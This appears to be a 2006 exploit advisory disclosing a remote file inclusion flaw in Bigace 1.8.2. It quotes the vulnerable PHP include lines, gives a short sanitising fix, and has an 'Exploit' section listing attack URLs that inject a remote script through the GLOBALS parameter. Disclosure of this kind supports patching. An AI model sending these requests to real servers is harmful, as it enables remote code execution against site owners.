Bigace 1.8.2 (GLOBALS) Remote File Inclusion

2006-08-2800:00:00

vulners.com

JSON

Author : Vampire

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

Affected Software Description:


Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

------------------------------------------------------------------------
---------------

Vulnerability:

~~~~~~~~~~~~~

in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability Script

----------------------------------------admin.cmd.php-----------------------
---------------

....

&lt;?php

            require_once&#40;$GLOBALS[&#39;_BIGACE&#39;][&#39;DIR&#39;][&#39;admin&#39;].&#39;styling.php&#39;&#41;;
            require_once&#40;$GLOBALS[&#39;_BIGACE&#39;][&#39;DIR&#39;][&#39;admin&#39;].&#39;functions.inc.php&#39;&#41;;
            include_once&#40;$GLOBALS[&#39;_BIGACE&#39;][&#39;DIR&#39;][&#39;libs&#39;].&#39;io.inc.php&#39;&#41;;
            

?&gt;

...
----------------------------------------download.cmd.php-----------------------
---------------
....

&lt;?php

            include_once&#40;$GLOBALS[&#39;_BIGACE&#39;][&#39;DIR&#39;][&#39;libs&#39;].&#39;io.inc.php&#39;&#41;;
            

?&gt;

...


----------------------------------------upload_form.php-----------------------
---------------
....

&lt;?php

           require_once&#40;$GLOBALS[&#39;_BIGACE&#39;][&#39;DIR&#39;][&#39;admin&#39;].&#39;include/mode_constants.php&#39;&#41;;
            

?&gt;

...




----------------------------------------item_main.php-----------------------
---------------
....


&lt;?php

          require_once&#40;$GLOBALS[&#39;_BIGACE&#39;][&#39;DIR&#39;][&#39;admin&#39;].&#39;include/mode_constants.php&#39;&#41;;



?&gt;

...



Exploit:

~~~~~~~


http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]

Solution:

~~~~~~~~

Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php , upload_form.php

------------------------------------------------------------------------
----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All Real Hackers

JSON

Bigace 1.8.2 &#40;GLOBALS&#41; Remote File Inclusion

Bigace 1.8.2 (GLOBALS) Remote File Inclusion